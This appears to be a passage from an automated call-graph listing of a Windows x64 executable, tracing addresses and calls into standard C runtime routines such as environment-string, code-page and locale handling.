7ff72936037c 45 API calls 18554->18563 18555 7ff72935ffd9 18556 7ff7293543f4 _get_daylight 11 API calls 18555->18556 18556->18560 18562 7ff7293600f4 18557->18562 18558->18548 18559->18544 18560->18547 18561->18560 18564 7ff7293626ec 40 API calls 18561->18564 18567 7ff7293626ec 40 API calls 18562->18567 18569 7ff7293600fa 18562->18569 18563->18548 18565 7ff72936017c 18564->18565 18566 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18565->18566 18568 7ff729360186 18566->18568 18571 7ff729360126 18567->18571 18568->18560 18568->18569 18570 7ff72936023f 18569->18570 18574 7ff72935dea8 _get_daylight 11 API calls 18569->18574 18572 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18570->18572 18573 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18571->18573 18572->18529 18573->18569 18575 7ff7293601cb 18574->18575 18576 7ff7293601dc 18575->18576 18577 7ff7293601d3 18575->18577 18579 7ff72935f784 37 API calls 18576->18579 18578 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18577->18578 18580 7ff7293601da 18578->18580 18581 7ff7293601ea 18579->18581 18587 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18580->18587 18582 7ff72936027f 18581->18582 18583 7ff7293601f2 SetEnvironmentVariableW 18581->18583 18586 7ff729359c10 _isindst 17 API calls 18582->18586 18584 7ff729360237 18583->18584 18585 7ff729360216 18583->18585 18588 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18584->18588 18589 7ff7293543f4 _get_daylight 11 API calls 18585->18589 18590 7ff729360293 18586->18590 18587->18529 18588->18570 18591 7ff72936021b 18589->18591 18592 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18591->18592 18592->18580 18594 7ff7293602c9 18593->18594 18595 7ff7293602b1 18593->18595 18596 7ff72935dea8 _get_daylight 11 API calls 18594->18596 18595->18469 18603 7ff7293602ed 18596->18603 18597 7ff72936034e 18600 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18597->18600 18598 7ff729359814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18599 7ff729360378 18598->18599 18600->18595 18601 7ff72935dea8 _get_daylight 11 API calls 18601->18603 18602 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18602->18603 18603->18597 18603->18601 18603->18602 18604 7ff7293597b4 __std_exception_copy 37 API calls 18603->18604 18605 7ff72936035d 18603->18605 18607 7ff729360372 18603->18607 18604->18603 18606 7ff729359c10 _isindst 17 API calls 18605->18606 18606->18607 18607->18598 18609 7ff7293589e8 18608->18609 18610 7ff7293589f1 18608->18610 18609->18610 18723 7ff7293584b0 18609->18723 18610->18486 18610->18487 18615 7ff729366449 18614->18615 18616 7ff729365564 18614->18616 18618 7ff729354178 45 API calls 18615->18618 18617 7ff729365571 18616->18617 18624 7ff7293655a7 18616->18624 18621 7ff7293543f4 _get_daylight 11 API calls 18617->18621 18637 7ff729365518 18617->18637 18620 7ff72936647d 18618->18620 18619 7ff7293655d1 18623 7ff7293543f4 _get_daylight 11 API calls 18619->18623 18627 7ff729366493 18620->18627 18631 7ff729366482 18620->18631 18633 7ff7293664aa 18620->18633 18622 7ff72936557b 18621->18622 18625 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 18622->18625 18626 7ff7293655d6 18623->18626 18624->18619 18632 7ff7293655f6 18624->18632 18629 7ff729365586 18625->18629 18630 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 18626->18630 18628 7ff7293543f4 _get_daylight 11 API calls 18627->18628 18634 7ff729366498 18628->18634 18629->18480 18643 7ff7293655e1 18630->18643 18631->18480 18638 7ff729354178 45 API calls 18632->18638 18632->18643 18635 7ff7293664b4 18633->18635 18636 7ff7293664c6 18633->18636 18639 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 18634->18639 18640 7ff7293543f4 _get_daylight 11 API calls 18635->18640 18641 7ff7293664ee 18636->18641 18642 7ff7293664d7 18636->18642 18637->18480 18638->18643 18639->18631 18644 7ff7293664b9 18640->18644 18965 7ff72936825c 18641->18965 18956 7ff7293655b4 18642->18956 18643->18480 18648 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 18644->18648 18648->18631 18649 7ff7293543f4 _get_daylight 11 API calls 18649->18631 18651 7ff72936272b 18650->18651 18652 7ff72936270e 18650->18652 18654 7ff729362735 18651->18654 19005 7ff729366f48 18651->19005 18652->18651 18653 7ff72936271c 18652->18653 18655 7ff7293543f4 _get_daylight 11 API calls 18653->18655 19012 7ff729366f84 18654->19012 18658 7ff729362721 __scrt_get_show_window_mode 18655->18658 18658->18505 18660 7ff729354178 45 API calls 18659->18660 18661 7ff7293665ba 18660->18661 18663 7ff7293665c8 18661->18663 19024 7ff72935e234 18661->19024 19027 7ff7293547bc 18663->19027 18666 7ff7293666b4 18668 7ff7293666c5 18666->18668 18670 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18666->18670 18667 7ff729354178 45 API calls 18669 7ff729366637 18667->18669 18671 7ff72935feb3 18668->18671 18673 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18668->18673 18672 7ff72935e234 5 API calls 18669->18672 18674 7ff729366640 18669->18674 18670->18668 18671->18523 18671->18524 18672->18674 18673->18671 18675 7ff7293547bc 14 API calls 18674->18675 18676 7ff72936669b 18675->18676 18676->18666 18677 7ff7293666a3 SetEnvironmentVariableW 18676->18677 18677->18666 18679 7ff7293603bc 18678->18679 18680 7ff72936039f 18678->18680 18681 7ff72935dea8 _get_daylight 11 API calls 18679->18681 18680->18536 18687 7ff7293603e0 18681->18687 18682 7ff729360441 18684 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18682->18684 18683 7ff729359814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18685 7ff72936046a 18683->18685 18684->18680 18686 7ff72935dea8 _get_daylight 11 API calls 18686->18687 18687->18682 18687->18686 18688 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18687->18688 18689 7ff72935f784 37 API calls 18687->18689 18690 7ff729360450 18687->18690 18692 7ff729360464 18687->18692 18688->18687 18689->18687 18691 7ff729359c10 _isindst 17 API calls 18690->18691 18691->18692 18692->18683 18694 7ff729358a24 18693->18694 18697 7ff729358a2d 18693->18697 18694->18697 19049 7ff729358524 18694->19049 18697->18554 18697->18555 18701 7ff729366309 18699->18701 18702 7ff729366336 18699->18702 18700 7ff72936630e 18703 7ff7293543f4 _get_daylight 11 API calls 18700->18703 18701->18700 18701->18702 18704 7ff72936637a 18702->18704 18707 7ff729366399 18702->18707 18721 7ff72936636e __crtLCMapStringW 18702->18721 18705 7ff729366313 18703->18705 18706 7ff7293543f4 _get_daylight 11 API calls 18704->18706 18708 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 18705->18708 18709 7ff72936637f 18706->18709 18710 7ff7293663a3 18707->18710 18711 7ff7293663b5 18707->18711 18712 7ff72936631e 18708->18712 18713 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 18709->18713 18714 7ff7293543f4 _get_daylight 11 API calls 18710->18714 18715 7ff729354178 45 API calls 18711->18715 18712->18548 18713->18721 18717 7ff7293663a8 18714->18717 18716 7ff7293663c2 18715->18716 18716->18721 19096 7ff729367e18 18716->19096 18718 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 18717->18718 18718->18721 18721->18548 18722 7ff7293543f4 _get_daylight 11 API calls 18722->18721 18724 7ff7293584c9 18723->18724 18725 7ff7293584c5 18723->18725 18746 7ff729361900 18724->18746 18725->18610 18738 7ff729358804 18725->18738 18730 7ff7293584db 18732 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18730->18732 18731 7ff7293584e7 18772 7ff729358594 18731->18772 18732->18725 18735 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18736 7ff72935850e 18735->18736 18737 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18736->18737 18737->18725 18739 7ff72935882d 18738->18739 18742 7ff729358846 18738->18742 18739->18610 18740 7ff72935faf8 WideCharToMultiByte 18740->18742 18741 7ff72935dea8 _get_daylight 11 API calls 18741->18742 18742->18739 18742->18740 18742->18741 18743 7ff7293588d6 18742->18743 18745 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18742->18745 18744 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18743->18744 18744->18739 18745->18742 18747 7ff72936190d 18746->18747 18748 7ff7293584ce 18746->18748 18791 7ff72935a534 18747->18791 18752 7ff729361c3c GetEnvironmentStringsW 18748->18752 18753 7ff729361c6c 18752->18753 18754 7ff7293584d3 18752->18754 18755 7ff72935faf8 WideCharToMultiByte 18753->18755 18754->18730 18754->18731 18756 7ff729361cbd 18755->18756 18757 7ff729361cc4 FreeEnvironmentStringsW 18756->18757 18758 7ff72935c90c _fread_nolock 12 API calls 18756->18758 18757->18754 18759 7ff729361cd7 18758->18759 18760 7ff729361ce8 18759->18760 18761 7ff729361cdf 18759->18761 18763 7ff72935faf8 WideCharToMultiByte 18760->18763 18762 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18761->18762 18764 7ff729361ce6 18762->18764 18765 7ff729361d0b 18763->18765 18764->18757 18766 7ff729361d19 18765->18766 18767 7ff729361d0f 18765->18767 18768 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18766->18768 18769 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18767->18769 18770 7ff729361d17 FreeEnvironmentStringsW 18768->18770 18769->18770 18770->18754 18773 7ff7293585b9 18772->18773 18774 7ff72935dea8 _get_daylight 11 API calls 18773->18774 18786 7ff7293585ef 18774->18786 18775 7ff7293585f7 18776 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18775->18776 18778 7ff7293584ef 18776->18778 18777 7ff72935866a 18779 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18777->18779 18778->18735 18779->18778 18780 7ff72935dea8 _get_daylight 11 API calls 18780->18786 18781 7ff729358659 18950 7ff7293587c0 18781->18950 18782 7ff7293597b4 __std_exception_copy 37 API calls 18782->18786 18785 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18785->18775 18786->18775 18786->18777 18786->18780 18786->18781 18786->18782 18787 7ff72935868f 18786->18787 18789 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18786->18789 18788 7ff729359c10 _isindst 17 API calls 18787->18788 18790 7ff7293586a2 18788->18790 18789->18786 18792 7ff72935a545 FlsGetValue 18791->18792 18793 7ff72935a560 FlsSetValue 18791->18793 18794 7ff72935a55a 18792->18794 18796 7ff72935a552 18792->18796 18795 7ff72935a56d 18793->18795 18793->18796 18794->18793 18799 7ff72935dea8 _get_daylight 11 API calls 18795->18799 18797 7ff72935a558 18796->18797 18798 7ff729359814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18796->18798 18811 7ff7293615d4 18797->18811 18800 7ff72935a5d5 18798->18800 18801 7ff72935a57c 18799->18801 18802 7ff72935a59a FlsSetValue 18801->18802 18803 7ff72935a58a FlsSetValue 18801->18803 18805 7ff72935a5b8 18802->18805 18806 7ff72935a5a6 FlsSetValue 18802->18806 18804 7ff72935a593 18803->18804 18807 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18804->18807 18808 7ff72935a204 _get_daylight 11 API calls 18805->18808 18806->18804 18807->18796 18809 7ff72935a5c0 18808->18809 18810 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18809->18810 18810->18797 18834 7ff729361844 18811->18834 18813 7ff729361609 18849 7ff7293612d4 18813->18849 18816 7ff729361626 18816->18748 18817 7ff72935c90c _fread_nolock 12 API calls 18818 7ff729361637 18817->18818 18819 7ff72936163f 18818->18819 18821 7ff72936164e 18818->18821 18820 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18819->18820 18820->18816 18821->18821 18856 7ff72936197c 18821->18856 18824 7ff72936174a 18825 7ff7293543f4 _get_daylight 11 API calls 18824->18825 18827 7ff72936174f 18825->18827 18826 7ff7293617a5 18830 7ff72936180c 18826->18830 18867 7ff729361104 18826->18867 18828 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18827->18828 18828->18816 18829 7ff729361764 18829->18826 18831 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18829->18831 18833 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18830->18833 18831->18826 18833->18816 18835 7ff729361867 18834->18835 18837 7ff729361871 18835->18837 18882 7ff72935f5e8 EnterCriticalSection 18835->18882 18839 7ff7293618e3 18837->18839 18841 7ff729359814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18837->18841 18839->18813 18843 7ff7293618fb 18841->18843 18844 7ff729361952 18843->18844 18846 7ff72935a534 50 API calls 18843->18846 18844->18813 18847 7ff72936193c 18846->18847 18848 7ff7293615d4 65 API calls 18847->18848 18848->18844 18850 7ff729354178 45 API calls 18849->18850 18851 7ff7293612e8 18850->18851 18852 7ff7293612f4 GetOEMCP 18851->18852 18853 7ff729361306 18851->18853 18855 7ff72936131b 18852->18855 18854 7ff72936130b GetACP 18853->18854 18853->18855 18854->18855 18855->18816 18855->18817 18857 7ff7293612d4 47 API calls 18856->18857 18858 7ff7293619a9 18857->18858 18859 7ff729361aff 18858->18859 18860 7ff7293619e6 IsValidCodePage 18858->18860 18866 7ff729361a00 __scrt_get_show_window_mode 18858->18866 18861 7ff72934b870 _log10_special 8 API calls 18859->18861 18860->18859 18862 7ff7293619f7 18860->18862 18863 7ff729361741 18861->18863 18864 7ff729361a26 GetCPInfo 18862->18864 18862->18866 18863->18824 18863->18829 18864->18859 18864->18866 18883 7ff7293613ec 18866->18883 18949 7ff72935f5e8 EnterCriticalSection 18867->18949 18884 7ff729361429 GetCPInfo 18883->18884 18885 7ff72936151f 18883->18885 18884->18885 18890 7ff72936143c 18884->18890 18886 7ff72934b870 _log10_special 8 API calls 18885->18886 18888 7ff7293615be 18886->18888 18887 7ff729362150 48 API calls 18889 7ff7293614b3 18887->18889 18888->18859 18894 7ff729366e94 18889->18894 18890->18887 18893 7ff729366e94 54 API calls 18893->18885 18895 7ff729354178 45 API calls 18894->18895 18896 7ff729366eb9 18895->18896 18899 7ff729366b60 18896->18899 18900 7ff729366ba1 18899->18900 18901 7ff72935ebb0 _fread_nolock MultiByteToWideChar 18900->18901 18904 7ff729366beb 18901->18904 18902 7ff729366e69 18903 7ff72934b870 _log10_special 8 API calls 18902->18903 18905 7ff7293614e6 18903->18905 18904->18902 18906 7ff72935c90c _fread_nolock 12 API calls 18904->18906 18908 7ff729366c23 18904->18908 18920 7ff729366d21 18904->18920 18905->18893 18906->18908 18907 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18907->18902 18909 7ff72935ebb0 _fread_nolock MultiByteToWideChar 18908->18909 18908->18920 18910 7ff729366c96 18909->18910 18910->18920 18930 7ff72935e3f4 18910->18930 18913 7ff729366d32 18915 7ff72935c90c _fread_nolock 12 API calls 18913->18915 18917 7ff729366e04 18913->18917 18919 7ff729366d50 18913->18919 18914 7ff729366ce1 18916 7ff72935e3f4 __crtLCMapStringW 6 API calls 18914->18916 18914->18920 18915->18919 18916->18920 18918 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18917->18918 18917->18920 18918->18920 18919->18920 18921 7ff72935e3f4 __crtLCMapStringW 6 API calls 18919->18921 18920->18902 18920->18907 18922 7ff729366dd0 18921->18922 18922->18917 18923 7ff729366e06 18922->18923 18924 7ff729366df0 18922->18924 18926 7ff72935faf8 WideCharToMultiByte 18923->18926 18925 7ff72935faf8 WideCharToMultiByte 18924->18925 18927 7ff729366dfe 18925->18927 18926->18927 18927->18917 18928 7ff729366e1e 18927->18928 18928->18920 18929 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18928->18929 18929->18920 18936 7ff72935e020 18930->18936 18933 7ff72935e43a 18933->18913 18933->18914 18933->18920 18935 7ff72935e4a3 LCMapStringW 18935->18933 18937 7ff72935e07d 18936->18937 18944 7ff72935e078 __vcrt_InitializeCriticalSectionEx 18936->18944 18937->18933 18946 7ff72935e4e0 18937->18946 18938 7ff72935e0ad LoadLibraryExW 18940 7ff72935e182 18938->18940 18941 7ff72935e0d2 GetLastError 18938->18941 18939 7ff72935e1a2 GetProcAddress 18939->18937 18943 7ff72935e1b3 18939->18943 18940->18939 18942 7ff72935e199 FreeLibrary 18940->18942 18941->18944 18942->18939 18943->18937 18944->18937 18944->18938 18944->18939 18945 7ff72935e10c LoadLibraryExW 18944->18945 18945->18940 18945->18944 18947 7ff72935e020 __crtLCMapStringW 5 API calls 18946->18947 18948 7ff72935e50e __crtLCMapStringW 18947->18948 18948->18935 18951 7ff7293587c5 18950->18951 18952 7ff729358661 18950->18952 18953 7ff7293587ee 18951->18953 18955 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18951->18955 18952->18785 18954 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18953->18954 18954->18952 18955->18951 18957 7ff7293655d1 18956->18957 18959 7ff7293655e8 18956->18959 18958 7ff7293543f4 _get_daylight 11 API calls 18957->18958 18960 7ff7293655d6 18958->18960 18959->18957 18961 7ff7293655f6 18959->18961 18962 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 18960->18962 18963 7ff729354178 45 API calls 18961->18963 18964 7ff7293655e1 18961->18964 18962->18964 18963->18964 18964->18631 18966 7ff729354178 45 API calls 18965->18966 18967 7ff729368281 18966->18967 18970 7ff729367ed8 18967->18970 18973 7ff729367f26 18970->18973 18971 7ff72934b870 _log10_special 8 API calls 18972 7ff729366515 18971->18972 18972->18631 18972->18649 18974 7ff729367fad 18973->18974 18976 7ff729367f98 GetCPInfo 18973->18976 18979 7ff729367fb1 18973->18979 18975 7ff72935ebb0 _fread_nolock MultiByteToWideChar 18974->18975 18974->18979 18977 7ff729368045 18975->18977 18976->18974 18976->18979 18978 7ff72935c90c _fread_nolock 12 API calls 18977->18978 18977->18979 18980 7ff72936807c 18977->18980 18978->18980 18979->18971 18980->18979 18981 7ff72935ebb0 _fread_nolock MultiByteToWideChar 18980->18981 18982 7ff7293680ea 18981->18982 18983 7ff7293681cc 18982->18983 18984 7ff72935ebb0 _fread_nolock MultiByteToWideChar 18982->18984 18983->18979 18985 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18983->18985 18986 7ff729368110 18984->18986 18985->18979 18986->18983 18987 7ff72935c90c _fread_nolock 12 API calls 18986->18987 18988 7ff72936813d 18986->18988 18987->18988 18988->18983 18989 7ff72935ebb0 _fread_nolock MultiByteToWideChar 18988->18989 18990 7ff7293681b4 18989->18990 18991 7ff7293681ba 18990->18991 18992 7ff7293681d4 18990->18992 18991->18983 18995 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18991->18995 18999 7ff72935e278 18992->18999 18995->18983 18996 7ff729368213 18996->18979 18998 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18996->18998 18997 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18997->18996 18998->18979 19000 7ff72935e020 __crtLCMapStringW 5 API calls 18999->19000 19001 7ff72935e2b6 19000->19001 19002 7ff72935e2be 19001->19002 19003 7ff72935e4e0 __crtLCMapStringW 5 API calls 19001->19003 19002->18996 19002->18997 19004 7ff72935e327 CompareStringW 19003->19004 19004->19002 19006 7ff729366f6a HeapSize 19005->19006 19007 7ff729366f51 19005->19007 19008 7ff7293543f4 _get_daylight 11 API calls 19007->19008 19009 7ff729366f56 19008->19009 19010 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19009->19010 19011 7ff729366f61 19010->19011 19011->18654 19013 7ff729366f99 19012->19013 19014 7ff729366fa3 19012->19014 19015 7ff72935c90c _fread_nolock 12 API calls 19013->19015 19016 7ff729366fa8 19014->19016 19022 7ff729366faf _get_daylight 19014->19022 19021 7ff729366fa1 19015->19021 19019 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19016->19019 19017 7ff729366fb5 19020 7ff7293543f4 _get_daylight 11 API calls 19017->19020 19018 7ff729366fe2 HeapReAlloc 19018->19021 19018->19022 19019->19021 19020->19021 19021->18658 19022->19017 19022->19018 19023 7ff7293628a0 _get_daylight 2 API calls 19022->19023 19023->19022 19025 7ff72935e020 __crtLCMapStringW 5 API calls 19024->19025 19026 7ff72935e254 19025->19026 19026->18663 19028 7ff72935480a 19027->19028 19029 7ff7293547e6 19027->19029 19030 7ff729354864 19028->19030 19031 7ff72935480f 19028->19031 19033 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19029->19033 19036 7ff7293547f5 19029->19036 19032 7ff72935ebb0 _fread_nolock MultiByteToWideChar 19030->19032 19034 7ff729354824 19031->19034 19031->19036 19037 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19031->19037 19043 7ff729354880 19032->19043 19033->19036 19038 7ff72935c90c _fread_nolock 12 API calls 19034->19038 19035 7ff729354887 GetLastError 19039 7ff729354368 _fread_nolock 11 API calls 19035->19039 19036->18666 19036->18667 19037->19034 19038->19036 19042 7ff729354894 19039->19042 19040 7ff7293548c2 19040->19036 19041 7ff72935ebb0 _fread_nolock MultiByteToWideChar 19040->19041 19046 7ff729354906 19041->19046 19047 7ff7293543f4 _get_daylight 11 API calls 19042->19047 19043->19035 19043->19040 19044 7ff7293548b5 19043->19044 19048 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19043->19048 19045 7ff72935c90c _fread_nolock 12 API calls 19044->19045 19045->19040 19046->19035 19046->19036 19047->19036 19048->19044 19050 7ff72935853d 19049->19050 19061 7ff729358539 19049->19061 19070 7ff729361d4c GetEnvironmentStringsW 19050->19070 19053 7ff72935854a 19056 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19053->19056 19054 7ff729358556 19077 7ff7293586a4 19054->19077 19056->19061 19058 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19059 7ff72935857d 19058->19059 19060 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19059->19060 19060->19061 19061->18697 19062 7ff7293588e4 19061->19062 19063 7ff729358907 19062->19063 19064 7ff72935891e 19062->19064 19063->18697 19064->19063 19065 7ff72935dea8 _get_daylight 11 API calls 19064->19065 19066 7ff729358992 19064->19066 19067 7ff72935ebb0 MultiByteToWideChar _fread_nolock 19064->19067 19069 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19064->19069 19065->19064 19068 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19066->19068 19067->19064 19068->19063 19069->19064 19071 7ff729358542 19070->19071 19072 7ff729361d70 19070->19072 19071->19053 19071->19054 19073 7ff72935c90c _fread_nolock 12 API calls 19072->19073 19075 7ff729361da7 memcpy_s 19073->19075 19074 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19076 7ff729361dc7 FreeEnvironmentStringsW 19074->19076 19075->19074 19076->19071 19079 7ff7293586cc 19077->19079 19078 7ff72935dea8 _get_daylight 11 API calls 19089 7ff729358707 19078->19089 19079->19078 19080 7ff72935870f 19081 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19080->19081 19082 7ff72935855e 19081->19082 19082->19058 19083 7ff729358789 19084 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19083->19084 19084->19082 19085 7ff72935dea8 _get_daylight 11 API calls 19085->19089 19086 7ff729358778 19088 7ff7293587c0 11 API calls 19086->19088 19087 7ff72935f784 37 API calls 19087->19089 19090 7ff729358780 19088->19090 19089->19080 19089->19083 19089->19085 19089->19086 19089->19087 19091 7ff7293587ac 19089->19091 19093 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19089->19093 19092 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19090->19092 19094 7ff729359c10 _isindst 17 API calls 19091->19094 19092->19080 19093->19089 19095 7ff7293587be 19094->19095 19098 7ff729367e41 __crtLCMapStringW 19096->19098 19097 7ff7293663fe 19097->18721 19097->18722 19098->19097 19099 7ff72935e278 6 API calls 19098->19099 19099->19097 19261 7ff729359060 19264 7ff729358fe4 19261->19264 19271 7ff72935f5e8 EnterCriticalSection 19264->19271 19731 7ff72935a2e0 19732 7ff72935a2e5 19731->19732 19733 7ff72935a2fa 19731->19733 19737 7ff72935a300 19732->19737 19738 7ff72935a34a 19737->19738 19739 7ff72935a342 19737->19739 19741 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19738->19741 19740 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19739->19740 19740->19738 19742 7ff72935a357 19741->19742 19743 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19742->19743 19744 7ff72935a364 19743->19744 19745 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19744->19745 19746 7ff72935a371 19745->19746 19747 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19746->19747 19748 7ff72935a37e 19747->19748 19749 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19748->19749 19750 7ff72935a38b 19749->19750 19751 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19750->19751 19752 7ff72935a398 19751->19752 19753 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19752->19753 19754 7ff72935a3a5 19753->19754 19755 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19754->19755 19756 7ff72935a3b5 19755->19756 19757 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19756->19757 19758 7ff72935a3c5 19757->19758 19763 7ff72935a1a4 19758->19763 19777 7ff72935f5e8 EnterCriticalSection 19763->19777 19838 7ff729369ef3 19839 7ff729369f03 19838->19839 19842 7ff729354788 LeaveCriticalSection 19839->19842 19351 7ff72934be70 19352 7ff72934be80 19351->19352 19368 7ff729358ec0 19352->19368 19354 7ff72934be8c 19374 7ff72934c168 19354->19374 19356 7ff72934bef9 19358 7ff72934c44c 7 API calls 19356->19358 19367 7ff72934bf15 19356->19367 19357 7ff72934bea4 _RTC_Initialize 19357->19356 19379 7ff72934c318 19357->19379 19359 7ff72934bf25 19358->19359 19361 7ff72934beb9 19382 7ff72935832c 19361->19382 19369 7ff729358ed1 19368->19369 19370 7ff729358ed9 19369->19370 19371 7ff7293543f4 _get_daylight 11 API calls 19369->19371 19370->19354 19372 7ff729358ee8 19371->19372 19373 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19372->19373 19373->19370 19375 7ff72934c179 19374->19375 19376 7ff72934c17e __scrt_release_startup_lock 19374->19376 19375->19376 19377 7ff72934c44c 7 API calls 19375->19377 19376->19357 19378 7ff72934c1f2 19377->19378 19407 7ff72934c2dc 19379->19407 19381 7ff72934c321 19381->19361 19383 7ff72935834c 19382->19383 19384 7ff72934bec5 19382->19384 19385 7ff72935836a GetModuleFileNameW 19383->19385 19386 7ff729358354 19383->19386 19384->19356 19406 7ff72934c3ec InitializeSListHead 19384->19406 19390 7ff729358395 19385->19390 19387 7ff7293543f4 _get_daylight 11 API calls 19386->19387 19388 7ff729358359 19387->19388 19389 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19388->19389 19389->19384 19422 7ff7293582cc 19390->19422 19393 7ff7293583dd 19394 7ff7293543f4 _get_daylight 11 API calls 19393->19394 19395 7ff7293583e2 19394->19395 19396 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19395->19396 19396->19384 19397 7ff7293583f5 19398 7ff729358417 19397->19398 19400 7ff72935845c 19397->19400 19401 7ff729358443 19397->19401 19399 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19398->19399 19399->19384 19404 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19400->19404 19402 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19401->19402 19403 7ff72935844c 19402->19403 19405 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19403->19405 19404->19398 19405->19384 19408 7ff72934c2f6 19407->19408 19410 7ff72934c2ef 19407->19410 19411 7ff7293594fc 19408->19411 19410->19381 19414 7ff729359138 19411->19414 19421 7ff72935f5e8 EnterCriticalSection 19414->19421 19423 7ff7293582e4 19422->19423 19424 7ff72935831c 19422->19424 19423->19424 19425 7ff72935dea8 _get_daylight 11 API calls 19423->19425 19424->19393 19424->19397 19426 7ff729358312 19425->19426 19427 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19426->19427 19427->19424 19451 7ff72936a079 19454 7ff729354788 LeaveCriticalSection 19451->19454 19213 7ff729358c79 19214 7ff7293596e8 45 API calls 19213->19214 19215 7ff729358c7e 19214->19215 19216 7ff729358ca5 GetModuleHandleW 19215->19216 19217 7ff729358cef 19215->19217 19216->19217 19223 7ff729358cb2 19216->19223 19225 7ff729358b7c 19217->19225 19223->19217 19239 7ff729358da0 GetModuleHandleExW 19223->19239 19245 